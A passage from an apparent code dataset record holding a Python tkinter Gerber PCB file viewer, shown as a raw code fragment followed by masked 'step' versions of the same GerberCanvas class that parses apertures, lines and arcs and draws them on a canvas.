return width, length
def __get_extent(self, radius):
distance = self.__distance(float(self.start_x), float(self.start_y), float(self.x), float(self.y))
if DEBUG:
print('distance = ', distance)
number = (1-((distance**2) / (2*(radius**2))))
result = number - int(number)
return math.acos(result)
@staticmethod
def __distance(start_x, start_y, end_x, end_y):
"""calculate distance between two points
:param start_x
:param start_y
:param end_x
:param end_y
"""
distance = math.sqrt((start_x - end_x) ** 2 + (start_y - end_y) ** 2)
return distance
def __set_direction(self):
if self.x == self.start_x:
if self.y < self.start_y:
self.direction = 90
else:
self.direction = 270
if self.y == self.start_y:
if self.x < self.start_x:
self.direction = 0
else:
self.direction = 180
def __get_numbers(self, item):
found = 0
if 'I' in item and 'J' in item and found == 0:
found = 1
i_start = item.find('I')
j_start = item.find('J')
d_start = item.find('D')
i_temp = item[i_start+1:j_start]
j_temp = item[j_start+1:d_start]
j_temp = str(int(j_temp) * -1)
self.i = self.__format_number(i_temp)
self.j = self.__format_number(j_temp)
if 'X' and 'Y' in item:
found = 0
if 'X' in item and 'Y' in item and found == 0:
found = 1
x_start = item.find('X')
y_start = item.find('Y')
d_start = item.find('D')
x_temp = item[x_start+1:y_start]
y_temp = item[y_start+1:d_start]
if ('I' or 'J') in y_temp:
for i in range(1, len(y_temp)):
if y_temp[i] == 'I':
y_temp = y_temp[0:i]
break
y_temp = str(int(y_temp) * -1)
self.x = self.__format_number(x_temp)
self.y = self.__format_number(y_temp)
if 'X' in item and found == 0:
found = 1
x_start = item.find('X')
d_start = item.find('D')
x_temp = item[x_start+1:d_start]
self.x = self.__format_number(x_temp)
if 'Y' in item and found == 0:
found = 1
y_start = item.find('Y')
d_start = item.find('D')
y_temp = item[y_start + 1:d_start]
# flip my y axis
y_temp = str(int(y_temp) * -1)
self.y = self.__format_number(y_temp)
def __format_number(self, number):
how_long = len(number)
if how_long <= int(self.x_format[1]):
if '-' in number:
temp = number[1:len(number)]
return '-.' + temp.zfill(int(self.x_format[1]))
else:
return '.' + number.zfill(int(self.x_format[1]))
elif how_long > int(self.x_format[1]):
last = number[-5:len(number)]
first = number[0:len(number)-5]
if '-' in number:
return first + '.' + last
# return '-' + first + '.' + last
else:
return first + '.' + last
def high_lite_part(self, x, y, layer):
x1 = self.__format_pnp(x)
y1 = self.__format_pnp(y) * -1
last_x = float(x1) + .1
last_y = float(y1) + .1
if layer == 'TopLayer':
color = 'red'
else:
color = 'blue'
self.__part_selected = self.my_canvas.create_oval(str(x1) + 'i', str(y1) + 'i', str(last_x) + 'i', str(last_y) + 'i',
outline=color, fill=color)
# elif layer == 'BottomLayer':
# self.__part_selected = self.my_canvas.create_oval(str(x1) + 'i', str(y1) + 'i', str(last_x) + 'i',
# str(last_y) + 'i', outline='blue', fill='blue')
def delete_current_highlight(self):
if self.__part_selected:
self.my_canvas.delete(self.__part_selected)
def __scale_image_up(self, event=None):
self.scale_factor = 1
self.scale_factor += .1
self.my_canvas.scale('all', 0, 0, self.scale_factor, self.scale_factor)
PickPlace.adjust_pic_n_place(self.scale_factor)
self.scaled = True
def __scale_image_down(self, event=None):
self.scale_factor = 1
self.scale_factor -= .1
self.my_canvas.scale('all', 0, 0, self.scale_factor, self.scale_factor)
if PickPlace.is_file_loaded:
PickPlace.adjust_pic_n_place(self.scale_factor)
self.scaled = True
def __scale_image(self, event=None):
if event.delta >= 120:
self.__scale_image_up()
elif event.delta <= -120:
self.__scale_image_down()
self.scaled = True
@staticmethod
def __format_pnp(number):
move1 = float(number) / 10
move2 = move1 / 10
final = move2 / 10
return final
def __parse_file_gtp(self):
# print(self.file_commands)
temp_list = self.file_commands
for item in temp_list:
# print(item)
if '%FSLA' in item:
self.x_format = item[6:8]
self.y_format = item[9:11]
if '%MO' in item:
self.units = item[3:5]
if 'IN' in item:
self.__inch = 1
self.__mm = 0
if 'MM' in item:
self.__inch = 0
self.__mm = 1
# print('units is ', self.units)
if 'G01' in item:
self.graphics_mode = 1 # sets Interpolation mode graphics state parameter to linear
if 'G03' in item:
self.direction = 270 # CounterClockWise
if 'G02' in item:
self.direction = 90 # ClockWise
if 'G74' in item:
self.quadrant_mode = 0 # single Quadrant mode
if 'G75' in item:
self.quadrant_mode = 1 # Multi quadrant mode
if '%AD' in item: # diameter of the circle
name = item[3:item.find(',') - 1]
# print(name)
start = item.find(',')
stop = item.find('*', start)
value = item[start - 1:stop]
# print(value)
self.AD_commands[name] = value[2:len(value)]
if item[0:1] == 'D':
item = item[0:item.find('*')]
# print('I found a ', item)
for key, value in self.AD_commands.items():
if item in key:
self.current_aperture = value
if 'D02' in item:
self.__get_numbers(item)
if 'X' in item and 'Y' not in item:
self.start_x = self.x
if 'Y' in item and 'X' not in item:
self.start_y = self.y
if 'X' in item and 'Y' in item:
self.start_x = self.x
self.start_y = self.y
if ('D01' in item) and (('I' not in item) and ('J' not in item)): # draw a line
self.__get_numbers(item)
# print(self.start_x, ',', self.start_y, ',', self.x, ',', self.y)
self.my_canvas.create_line(self.start_x + 'i', self.start_y + 'i', self.x + 'i', self.y + 'i',
width=self.current_aperture + 'i')
self.start_x = self.x
self.start_y = self.y
# this Draws a circle.
if 'D01' and 'I' and 'J' in item: # draw a circle
self.start_x = self.x
self.start_y = self.y
self.__get_numbers(item)
if self.quadrant_mode: # This draws circles or arcs
if (self.start_x == self.x) and (self.start_y == self.y): # This draws circles
cp_x = float(self.start_x) + float(self.i)
cp_y = float(self.start_y) + float(self.j)
if self.i != 0:
radius = float(self.i)
elif self.j != 0:
radius = float(self.j)
self.my_canvas.create_oval(str(cp_x - radius) + 'i', str(cp_y - radius) + 'i',
str(cp_x + radius) + 'i', str(cp_y + radius) + 'i',
outline='black', width=self.current_aperture)
else: # This draws arcs
cp_x = float(self.start_x) + float(self.i)
cp_y = float(self.start_y) + float(self.j)
# print(str(cp_x) + ' ' + str(cp_y))
if float(self.i) > 0:
radius = float(self.i)
elif float(self.j) > 0:
radius = float(self.j)
self.__set_direction()
start_angle = math.degrees(math.atan2(float(self.start_y) - cp_y, float(self.start_x) - cp_x))
end_angle = math.degrees(math.atan2(float(self.y) - cp_y, float(self.x) - cp_x))
ext = math.degrees(self.__get_extent(radius))
self.my_canvas.create_arc(str(cp_x + radius) + 'i', str(cp_y + radius) + 'i',
str(cp_x - radius) + 'i', str(cp_y - radius) + 'i', style=tk.ARC,
width=self.current_aperture, start=start_angle,
extent=end_angle - start_angle, outline='black')
# self.my_canvas.create_arc('0', '0', '100', '100', style='arc', start=90, extent=180,
# outline='purple')
|
flexible
|
{
"blob_id": "6b2f10449909d978ee294a502a376c8091af06e0",
"index": 1285,
"step-1": "<mask token>\n\n\nclass GerberCanvas:\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def __init__(self, frame):\n self.x_format = ''\n self.y_format = ''\n self.units = ''\n self.quadrant_mode = 0\n self.file_commands = ''\n self.file_gtp_commands = ''\n self.gerber_file_name = ''\n self.AD_commands = {}\n self.current_aperture = ''\n self.x = '0'\n self.y = '0'\n self.i = '0'\n self.j = '0'\n self.last_x = ''\n self.last_y = ''\n self.start_x = ''\n self.start_y = ''\n self.direction = 0\n self.graphics_mode = 0\n self.scaled = False\n self.bounding_box_size = ()\n self._canvas_frame = frame\n self.create_canvas()\n\n def create_canvas(self):\n self.my_canvas = tk.Canvas(self._canvas_frame, bg='white', bd='1')\n self.my_canvas.pack(expand=True, fill='both')\n if sys.platform == 'linux':\n self.my_canvas.bind('<Button-4>', self.__scale_image_up)\n self.my_canvas.bind('<Button-5>', self.__scale_image_down)\n else:\n self.my_canvas.bind('<MouseWheel>', self.__scale_image)\n self.y_scrollbar = tk.Scrollbar(self.my_canvas, command=self.\n my_canvas.yview)\n self.y_scrollbar.pack(expand=True, fill='y', anchor='e')\n self.x_scrollbar = tk.Scrollbar(self.my_canvas, orient=tk.\n HORIZONTAL, command=self.my_canvas.xview)\n self.x_scrollbar.pack(fill='x', anchor='s')\n if sys.platform == 'linux':\n self.my_canvas.configure(xscrollcommand=self.x_scrollbar.set,\n yscrollcommand=self.y_scrollbar.set)\n self.__part_selected = 0\n <mask token>\n\n def load_gerber_gtp(self, file_path):\n self.file_gtp = True\n try:\n print(file_path)\n new_file = 'c' + file_path[1:len(file_path) - 3] + 'GTP'\n print('final name =', new_file)\n if file_path:\n try:\n with open(new_file, 'r') as gerber_file:\n self.file_gtp_commands = gerber_file.read().splitlines(\n )\n except TypeError:\n messagebox.showerror('Type Error', 'Invalid File Type')\n self.__parse_file(self.file_gtp_commands)\n except IOError:\n messagebox.showerror('File Error', 'File did not 
open, GTP')\n\n def __parse_file(self, commands):\n if DEBUG:\n print(self.file_commands)\n temp_list = commands\n for item in temp_list:\n if DEBUG:\n print(item)\n if '%FSLA' in item:\n self.x_format = item[6:8]\n self.y_format = item[9:11]\n if '%MO' in item:\n self.units = item[3:5]\n if 'IN' in item:\n GerberCanvas.units = 0\n if 'MM' in item:\n GerberCanvas.units = 1\n if 'G01' in item:\n self.graphics_mode = 1\n if 'G03' in item:\n self.direction = 270\n if 'G02' in item:\n self.direction = 90\n if 'G74' in item:\n self.quadrant_mode = 0\n if 'G75' in item:\n self.quadrant_mode = 1\n if '%AD' in item:\n name = item[3:item.find(',') - 1]\n if DEBUG:\n print(name)\n start = item.find(',')\n stop = item.find('*', start)\n value = item[start - 1:stop]\n if DEBUG:\n print(value)\n self.AD_commands[name] = value\n if item[0:1] == 'D':\n item = item[0:item.find('*')]\n if DEBUG:\n print('I found a ', item)\n for key, value in self.AD_commands.items():\n self.current_ad_command = key\n if item in key:\n if 'R,' in value:\n print(value)\n x, y = self.__get_rectangle_size(value)\n self.rect_x = x\n self.rect_y = y\n print('Half of x is: ', float(self.rect_x) / 2)\n elif 'C,' in value:\n print(value)\n self.current_aperture = self.__get_circle_diameter(\n value)\n elif 'O,' in value:\n pass\n elif 'P,' in value:\n pass\n elif 'TARGET' in value:\n pass\n elif 'THERMAL' in value:\n pass\n if 'D03' in item:\n if DEBUG:\n print('current key is = ', self.current_ad_command)\n print(self.AD_commands[self.current_ad_command])\n if 'R,' in self.AD_commands[self.current_ad_command]:\n if DEBUG:\n print('draw a rectangle')\n x0 = float(self.start_x) - float(self.rect_x) / 2\n y0 = float(self.start_y) + float(self.rect_y) / 2\n x1 = float(self.start_x) + float(self.rect_x) / 2\n y1 = float(self.start_y) - float(self.rect_y) / 2\n self.my_canvas.create_rectangle(str(x0) + GerberCanvas.\n units_string[GerberCanvas.units], str(y0) +\n GerberCanvas.units_string[GerberCanvas.units], 
str(\n x1) + GerberCanvas.units_string[GerberCanvas.units],\n str(y1) + GerberCanvas.units_string[GerberCanvas.\n units], outline='white', fill='black')\n if 'C,' in self.AD_commands[self.current_ad_command]:\n print('draw a circle')\n if 'D02' in item:\n self.__get_numbers(item)\n if 'X' in item and 'Y' not in item:\n self.start_x = self.x\n if 'Y' in item and 'X' not in item:\n self.start_y = self.y\n if 'X' in item and 'Y' in item:\n self.start_x = self.x\n self.start_y = self.y\n if 'D01' in item and ('I' not in item and 'J' not in item):\n if self.file_gto:\n self.__get_numbers(item)\n if DEBUG:\n print(self.start_x, ',', self.start_y, ',', self.x,\n ',', self.y)\n self.my_canvas.create_line(self.start_x + 'i', self.\n start_y + 'i', self.x + 'i', self.y + 'i', width=\n self.current_aperture + 'i')\n self.start_x = self.x\n self.start_y = self.y\n if 'D01' and 'I' and 'J' in item:\n if self.file_gto:\n self.start_x = self.x\n self.start_y = self.y\n self.__get_numbers(item)\n if self.quadrant_mode:\n if self.start_x == self.x and self.start_y == self.y:\n cp_x = float(self.start_x) + float(self.i)\n cp_y = float(self.start_y) + float(self.j)\n if self.i != 0:\n radius = float(self.i)\n elif self.j != 0:\n radius = float(self.j)\n try:\n self.my_canvas.create_oval(str(cp_x -\n radius) + GerberCanvas.units_string[\n GerberCanvas.units], str(cp_y - radius) +\n GerberCanvas.units_string[GerberCanvas.\n units], str(cp_x + radius) +\n GerberCanvas.units_string[GerberCanvas.\n units], str(cp_y + radius) +\n GerberCanvas.units_string[GerberCanvas.\n units], outline='black', width=self.\n current_aperture)\n except UnboundLocalError():\n messagebox.showwarning('Warning',\n 'Something went wrong.')\n break\n else:\n cp_x = float(self.start_x) + float(self.i)\n cp_y = float(self.start_y) + float(self.j)\n if DEBUG:\n print(str(cp_x) + ' ' + str(cp_y))\n if float(self.i) > 0:\n radius = float(self.i)\n elif float(self.j) > 0:\n radius = float(self.j)\n else:\n radius = 
0.0\n self.__set_direction()\n start_angle = math.degrees(math.atan2(float(\n self.start_y) - cp_y, float(self.start_x) -\n cp_x))\n end_angle = math.degrees(math.atan2(float(self.\n y) - cp_y, float(self.x) - cp_x))\n try:\n self.my_canvas.create_arc(str(cp_x + radius\n ) + GerberCanvas.units_string[\n GerberCanvas.units], str(cp_y + radius) +\n GerberCanvas.units_string[GerberCanvas.\n units], str(cp_x - radius) +\n GerberCanvas.units_string[GerberCanvas.\n units], str(cp_y - radius) +\n GerberCanvas.units_string[GerberCanvas.\n units], style=tk.ARC, width=self.\n current_aperture, start=start_angle,\n extent=end_angle - start_angle, outline\n ='black')\n except UnboundLocalError():\n messagebox.showwarning('Warning',\n 'Something went wrong.')\n\n @staticmethod\n def __get_circle_diameter(value):\n return value[3:len(value)]\n\n @staticmethod\n def __get_rectangle_size(value):\n print(value)\n find_x = value.find('X'[0:len(value)])\n width = value[2:find_x]\n length = value[find_x + 1:len(value)]\n print(width, length)\n return width, length\n\n def __get_extent(self, radius):\n distance = self.__distance(float(self.start_x), float(self.start_y),\n float(self.x), float(self.y))\n if DEBUG:\n print('distance = ', distance)\n number = 1 - distance ** 2 / (2 * radius ** 2)\n result = number - int(number)\n return math.acos(result)\n\n @staticmethod\n def __distance(start_x, start_y, end_x, end_y):\n \"\"\"calculate distance between two points\n :param start_x\n :param start_y\n :param end_x\n :param end_y\n \"\"\"\n distance = math.sqrt((start_x - end_x) ** 2 + (start_y - end_y) ** 2)\n return distance\n\n def __set_direction(self):\n if self.x == self.start_x:\n if self.y < self.start_y:\n self.direction = 90\n else:\n self.direction = 270\n if self.y == self.start_y:\n if self.x < self.start_x:\n self.direction = 0\n else:\n self.direction = 180\n\n def __get_numbers(self, item):\n found = 0\n if 'I' in item and 'J' in item and found == 0:\n found = 1\n i_start = 
item.find('I')\n j_start = item.find('J')\n d_start = item.find('D')\n i_temp = item[i_start + 1:j_start]\n j_temp = item[j_start + 1:d_start]\n j_temp = str(int(j_temp) * -1)\n self.i = self.__format_number(i_temp)\n self.j = self.__format_number(j_temp)\n if 'X' and 'Y' in item:\n found = 0\n if 'X' in item and 'Y' in item and found == 0:\n found = 1\n x_start = item.find('X')\n y_start = item.find('Y')\n d_start = item.find('D')\n x_temp = item[x_start + 1:y_start]\n y_temp = item[y_start + 1:d_start]\n if ('I' or 'J') in y_temp:\n for i in range(1, len(y_temp)):\n if y_temp[i] == 'I':\n y_temp = y_temp[0:i]\n break\n y_temp = str(int(y_temp) * -1)\n self.x = self.__format_number(x_temp)\n self.y = self.__format_number(y_temp)\n if 'X' in item and found == 0:\n found = 1\n x_start = item.find('X')\n d_start = item.find('D')\n x_temp = item[x_start + 1:d_start]\n self.x = self.__format_number(x_temp)\n if 'Y' in item and found == 0:\n found = 1\n y_start = item.find('Y')\n d_start = item.find('D')\n y_temp = item[y_start + 1:d_start]\n y_temp = str(int(y_temp) * -1)\n self.y = self.__format_number(y_temp)\n\n def __format_number(self, number):\n how_long = len(number)\n if how_long <= int(self.x_format[1]):\n if '-' in number:\n temp = number[1:len(number)]\n return '-.' + temp.zfill(int(self.x_format[1]))\n else:\n return '.' + number.zfill(int(self.x_format[1]))\n elif how_long > int(self.x_format[1]):\n last = number[-5:len(number)]\n first = number[0:len(number) - 5]\n if '-' in number:\n return first + '.' + last\n else:\n return first + '.' 
+ last\n <mask token>\n\n def delete_current_highlight(self):\n if self.__part_selected:\n self.my_canvas.delete(self.__part_selected)\n\n def __scale_image_up(self, event=None):\n self.scale_factor = 1\n self.scale_factor += 0.1\n self.my_canvas.scale('all', 0, 0, self.scale_factor, self.scale_factor)\n PickPlace.adjust_pic_n_place(self.scale_factor)\n self.scaled = True\n\n def __scale_image_down(self, event=None):\n self.scale_factor = 1\n self.scale_factor -= 0.1\n self.my_canvas.scale('all', 0, 0, self.scale_factor, self.scale_factor)\n if PickPlace.is_file_loaded:\n PickPlace.adjust_pic_n_place(self.scale_factor)\n self.scaled = True\n\n def __scale_image(self, event=None):\n if event.delta >= 120:\n self.__scale_image_up()\n elif event.delta <= -120:\n self.__scale_image_down()\n self.scaled = True\n\n @staticmethod\n def __format_pnp(number):\n move1 = float(number) / 10\n move2 = move1 / 10\n final = move2 / 10\n return final\n\n def __parse_file_gtp(self):\n temp_list = self.file_commands\n for item in temp_list:\n if '%FSLA' in item:\n self.x_format = item[6:8]\n self.y_format = item[9:11]\n if '%MO' in item:\n self.units = item[3:5]\n if 'IN' in item:\n self.__inch = 1\n self.__mm = 0\n if 'MM' in item:\n self.__inch = 0\n self.__mm = 1\n if 'G01' in item:\n self.graphics_mode = 1\n if 'G03' in item:\n self.direction = 270\n if 'G02' in item:\n self.direction = 90\n if 'G74' in item:\n self.quadrant_mode = 0\n if 'G75' in item:\n self.quadrant_mode = 1\n if '%AD' in item:\n name = item[3:item.find(',') - 1]\n start = item.find(',')\n stop = item.find('*', start)\n value = item[start - 1:stop]\n self.AD_commands[name] = value[2:len(value)]\n if item[0:1] == 'D':\n item = item[0:item.find('*')]\n for key, value in self.AD_commands.items():\n if item in key:\n self.current_aperture = value\n if 'D02' in item:\n self.__get_numbers(item)\n if 'X' in item and 'Y' not in item:\n self.start_x = self.x\n if 'Y' in item and 'X' not in item:\n self.start_y = 
self.y\n if 'X' in item and 'Y' in item:\n self.start_x = self.x\n self.start_y = self.y\n if 'D01' in item and ('I' not in item and 'J' not in item):\n self.__get_numbers(item)\n self.my_canvas.create_line(self.start_x + 'i', self.start_y +\n 'i', self.x + 'i', self.y + 'i', width=self.\n current_aperture + 'i')\n self.start_x = self.x\n self.start_y = self.y\n if 'D01' and 'I' and 'J' in item:\n self.start_x = self.x\n self.start_y = self.y\n self.__get_numbers(item)\n if self.quadrant_mode:\n if self.start_x == self.x and self.start_y == self.y:\n cp_x = float(self.start_x) + float(self.i)\n cp_y = float(self.start_y) + float(self.j)\n if self.i != 0:\n radius = float(self.i)\n elif self.j != 0:\n radius = float(self.j)\n self.my_canvas.create_oval(str(cp_x - radius) + 'i',\n str(cp_y - radius) + 'i', str(cp_x + radius) +\n 'i', str(cp_y + radius) + 'i', outline='black',\n width=self.current_aperture)\n else:\n cp_x = float(self.start_x) + float(self.i)\n cp_y = float(self.start_y) + float(self.j)\n if float(self.i) > 0:\n radius = float(self.i)\n elif float(self.j) > 0:\n radius = float(self.j)\n self.__set_direction()\n start_angle = math.degrees(math.atan2(float(self.\n start_y) - cp_y, float(self.start_x) - cp_x))\n end_angle = math.degrees(math.atan2(float(self.y) -\n cp_y, float(self.x) - cp_x))\n ext = math.degrees(self.__get_extent(radius))\n self.my_canvas.create_arc(str(cp_x + radius) + 'i',\n str(cp_y + radius) + 'i', str(cp_x - radius) +\n 'i', str(cp_y - radius) + 'i', style=tk.ARC,\n width=self.current_aperture, start=start_angle,\n extent=end_angle - start_angle, outline='black')\n",
"step-2": "<mask token>\n\n\nclass GerberCanvas:\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def __init__(self, frame):\n self.x_format = ''\n self.y_format = ''\n self.units = ''\n self.quadrant_mode = 0\n self.file_commands = ''\n self.file_gtp_commands = ''\n self.gerber_file_name = ''\n self.AD_commands = {}\n self.current_aperture = ''\n self.x = '0'\n self.y = '0'\n self.i = '0'\n self.j = '0'\n self.last_x = ''\n self.last_y = ''\n self.start_x = ''\n self.start_y = ''\n self.direction = 0\n self.graphics_mode = 0\n self.scaled = False\n self.bounding_box_size = ()\n self._canvas_frame = frame\n self.create_canvas()\n\n def create_canvas(self):\n self.my_canvas = tk.Canvas(self._canvas_frame, bg='white', bd='1')\n self.my_canvas.pack(expand=True, fill='both')\n if sys.platform == 'linux':\n self.my_canvas.bind('<Button-4>', self.__scale_image_up)\n self.my_canvas.bind('<Button-5>', self.__scale_image_down)\n else:\n self.my_canvas.bind('<MouseWheel>', self.__scale_image)\n self.y_scrollbar = tk.Scrollbar(self.my_canvas, command=self.\n my_canvas.yview)\n self.y_scrollbar.pack(expand=True, fill='y', anchor='e')\n self.x_scrollbar = tk.Scrollbar(self.my_canvas, orient=tk.\n HORIZONTAL, command=self.my_canvas.xview)\n self.x_scrollbar.pack(fill='x', anchor='s')\n if sys.platform == 'linux':\n self.my_canvas.configure(xscrollcommand=self.x_scrollbar.set,\n yscrollcommand=self.y_scrollbar.set)\n self.__part_selected = 0\n <mask token>\n\n def load_gerber_gtp(self, file_path):\n self.file_gtp = True\n try:\n print(file_path)\n new_file = 'c' + file_path[1:len(file_path) - 3] + 'GTP'\n print('final name =', new_file)\n if file_path:\n try:\n with open(new_file, 'r') as gerber_file:\n self.file_gtp_commands = gerber_file.read().splitlines(\n )\n except TypeError:\n messagebox.showerror('Type Error', 'Invalid File Type')\n self.__parse_file(self.file_gtp_commands)\n except IOError:\n messagebox.showerror('File Error', 'File did not 
open, GTP')\n\n def __parse_file(self, commands):\n if DEBUG:\n print(self.file_commands)\n temp_list = commands\n for item in temp_list:\n if DEBUG:\n print(item)\n if '%FSLA' in item:\n self.x_format = item[6:8]\n self.y_format = item[9:11]\n if '%MO' in item:\n self.units = item[3:5]\n if 'IN' in item:\n GerberCanvas.units = 0\n if 'MM' in item:\n GerberCanvas.units = 1\n if 'G01' in item:\n self.graphics_mode = 1\n if 'G03' in item:\n self.direction = 270\n if 'G02' in item:\n self.direction = 90\n if 'G74' in item:\n self.quadrant_mode = 0\n if 'G75' in item:\n self.quadrant_mode = 1\n if '%AD' in item:\n name = item[3:item.find(',') - 1]\n if DEBUG:\n print(name)\n start = item.find(',')\n stop = item.find('*', start)\n value = item[start - 1:stop]\n if DEBUG:\n print(value)\n self.AD_commands[name] = value\n if item[0:1] == 'D':\n item = item[0:item.find('*')]\n if DEBUG:\n print('I found a ', item)\n for key, value in self.AD_commands.items():\n self.current_ad_command = key\n if item in key:\n if 'R,' in value:\n print(value)\n x, y = self.__get_rectangle_size(value)\n self.rect_x = x\n self.rect_y = y\n print('Half of x is: ', float(self.rect_x) / 2)\n elif 'C,' in value:\n print(value)\n self.current_aperture = self.__get_circle_diameter(\n value)\n elif 'O,' in value:\n pass\n elif 'P,' in value:\n pass\n elif 'TARGET' in value:\n pass\n elif 'THERMAL' in value:\n pass\n if 'D03' in item:\n if DEBUG:\n print('current key is = ', self.current_ad_command)\n print(self.AD_commands[self.current_ad_command])\n if 'R,' in self.AD_commands[self.current_ad_command]:\n if DEBUG:\n print('draw a rectangle')\n x0 = float(self.start_x) - float(self.rect_x) / 2\n y0 = float(self.start_y) + float(self.rect_y) / 2\n x1 = float(self.start_x) + float(self.rect_x) / 2\n y1 = float(self.start_y) - float(self.rect_y) / 2\n self.my_canvas.create_rectangle(str(x0) + GerberCanvas.\n units_string[GerberCanvas.units], str(y0) +\n GerberCanvas.units_string[GerberCanvas.units], 
str(\n x1) + GerberCanvas.units_string[GerberCanvas.units],\n str(y1) + GerberCanvas.units_string[GerberCanvas.\n units], outline='white', fill='black')\n if 'C,' in self.AD_commands[self.current_ad_command]:\n print('draw a circle')\n if 'D02' in item:\n self.__get_numbers(item)\n if 'X' in item and 'Y' not in item:\n self.start_x = self.x\n if 'Y' in item and 'X' not in item:\n self.start_y = self.y\n if 'X' in item and 'Y' in item:\n self.start_x = self.x\n self.start_y = self.y\n if 'D01' in item and ('I' not in item and 'J' not in item):\n if self.file_gto:\n self.__get_numbers(item)\n if DEBUG:\n print(self.start_x, ',', self.start_y, ',', self.x,\n ',', self.y)\n self.my_canvas.create_line(self.start_x + 'i', self.\n start_y + 'i', self.x + 'i', self.y + 'i', width=\n self.current_aperture + 'i')\n self.start_x = self.x\n self.start_y = self.y\n if 'D01' and 'I' and 'J' in item:\n if self.file_gto:\n self.start_x = self.x\n self.start_y = self.y\n self.__get_numbers(item)\n if self.quadrant_mode:\n if self.start_x == self.x and self.start_y == self.y:\n cp_x = float(self.start_x) + float(self.i)\n cp_y = float(self.start_y) + float(self.j)\n if self.i != 0:\n radius = float(self.i)\n elif self.j != 0:\n radius = float(self.j)\n try:\n self.my_canvas.create_oval(str(cp_x -\n radius) + GerberCanvas.units_string[\n GerberCanvas.units], str(cp_y - radius) +\n GerberCanvas.units_string[GerberCanvas.\n units], str(cp_x + radius) +\n GerberCanvas.units_string[GerberCanvas.\n units], str(cp_y + radius) +\n GerberCanvas.units_string[GerberCanvas.\n units], outline='black', width=self.\n current_aperture)\n except UnboundLocalError():\n messagebox.showwarning('Warning',\n 'Something went wrong.')\n break\n else:\n cp_x = float(self.start_x) + float(self.i)\n cp_y = float(self.start_y) + float(self.j)\n if DEBUG:\n print(str(cp_x) + ' ' + str(cp_y))\n if float(self.i) > 0:\n radius = float(self.i)\n elif float(self.j) > 0:\n radius = float(self.j)\n else:\n radius = 
0.0\n self.__set_direction()\n start_angle = math.degrees(math.atan2(float(\n self.start_y) - cp_y, float(self.start_x) -\n cp_x))\n end_angle = math.degrees(math.atan2(float(self.\n y) - cp_y, float(self.x) - cp_x))\n try:\n self.my_canvas.create_arc(str(cp_x + radius\n ) + GerberCanvas.units_string[\n GerberCanvas.units], str(cp_y + radius) +\n GerberCanvas.units_string[GerberCanvas.\n units], str(cp_x - radius) +\n GerberCanvas.units_string[GerberCanvas.\n units], str(cp_y - radius) +\n GerberCanvas.units_string[GerberCanvas.\n units], style=tk.ARC, width=self.\n current_aperture, start=start_angle,\n extent=end_angle - start_angle, outline\n ='black')\n except UnboundLocalError():\n messagebox.showwarning('Warning',\n 'Something went wrong.')\n\n @staticmethod\n def __get_circle_diameter(value):\n return value[3:len(value)]\n\n @staticmethod\n def __get_rectangle_size(value):\n print(value)\n find_x = value.find('X'[0:len(value)])\n width = value[2:find_x]\n length = value[find_x + 1:len(value)]\n print(width, length)\n return width, length\n\n def __get_extent(self, radius):\n distance = self.__distance(float(self.start_x), float(self.start_y),\n float(self.x), float(self.y))\n if DEBUG:\n print('distance = ', distance)\n number = 1 - distance ** 2 / (2 * radius ** 2)\n result = number - int(number)\n return math.acos(result)\n\n @staticmethod\n def __distance(start_x, start_y, end_x, end_y):\n \"\"\"calculate distance between two points\n :param start_x\n :param start_y\n :param end_x\n :param end_y\n \"\"\"\n distance = math.sqrt((start_x - end_x) ** 2 + (start_y - end_y) ** 2)\n return distance\n\n def __set_direction(self):\n if self.x == self.start_x:\n if self.y < self.start_y:\n self.direction = 90\n else:\n self.direction = 270\n if self.y == self.start_y:\n if self.x < self.start_x:\n self.direction = 0\n else:\n self.direction = 180\n\n def __get_numbers(self, item):\n found = 0\n if 'I' in item and 'J' in item and found == 0:\n found = 1\n i_start = 
item.find('I')\n j_start = item.find('J')\n d_start = item.find('D')\n i_temp = item[i_start + 1:j_start]\n j_temp = item[j_start + 1:d_start]\n j_temp = str(int(j_temp) * -1)\n self.i = self.__format_number(i_temp)\n self.j = self.__format_number(j_temp)\n if 'X' and 'Y' in item:\n found = 0\n if 'X' in item and 'Y' in item and found == 0:\n found = 1\n x_start = item.find('X')\n y_start = item.find('Y')\n d_start = item.find('D')\n x_temp = item[x_start + 1:y_start]\n y_temp = item[y_start + 1:d_start]\n if ('I' or 'J') in y_temp:\n for i in range(1, len(y_temp)):\n if y_temp[i] == 'I':\n y_temp = y_temp[0:i]\n break\n y_temp = str(int(y_temp) * -1)\n self.x = self.__format_number(x_temp)\n self.y = self.__format_number(y_temp)\n if 'X' in item and found == 0:\n found = 1\n x_start = item.find('X')\n d_start = item.find('D')\n x_temp = item[x_start + 1:d_start]\n self.x = self.__format_number(x_temp)\n if 'Y' in item and found == 0:\n found = 1\n y_start = item.find('Y')\n d_start = item.find('D')\n y_temp = item[y_start + 1:d_start]\n y_temp = str(int(y_temp) * -1)\n self.y = self.__format_number(y_temp)\n\n def __format_number(self, number):\n how_long = len(number)\n if how_long <= int(self.x_format[1]):\n if '-' in number:\n temp = number[1:len(number)]\n return '-.' + temp.zfill(int(self.x_format[1]))\n else:\n return '.' + number.zfill(int(self.x_format[1]))\n elif how_long > int(self.x_format[1]):\n last = number[-5:len(number)]\n first = number[0:len(number) - 5]\n if '-' in number:\n return first + '.' + last\n else:\n return first + '.' 
+ last\n\n def high_lite_part(self, x, y, layer):\n x1 = self.__format_pnp(x)\n y1 = self.__format_pnp(y) * -1\n last_x = float(x1) + 0.1\n last_y = float(y1) + 0.1\n if layer == 'TopLayer':\n color = 'red'\n else:\n color = 'blue'\n self.__part_selected = self.my_canvas.create_oval(str(x1) + 'i', \n str(y1) + 'i', str(last_x) + 'i', str(last_y) + 'i', outline=\n color, fill=color)\n\n def delete_current_highlight(self):\n if self.__part_selected:\n self.my_canvas.delete(self.__part_selected)\n\n def __scale_image_up(self, event=None):\n self.scale_factor = 1\n self.scale_factor += 0.1\n self.my_canvas.scale('all', 0, 0, self.scale_factor, self.scale_factor)\n PickPlace.adjust_pic_n_place(self.scale_factor)\n self.scaled = True\n\n def __scale_image_down(self, event=None):\n self.scale_factor = 1\n self.scale_factor -= 0.1\n self.my_canvas.scale('all', 0, 0, self.scale_factor, self.scale_factor)\n if PickPlace.is_file_loaded:\n PickPlace.adjust_pic_n_place(self.scale_factor)\n self.scaled = True\n\n def __scale_image(self, event=None):\n if event.delta >= 120:\n self.__scale_image_up()\n elif event.delta <= -120:\n self.__scale_image_down()\n self.scaled = True\n\n @staticmethod\n def __format_pnp(number):\n move1 = float(number) / 10\n move2 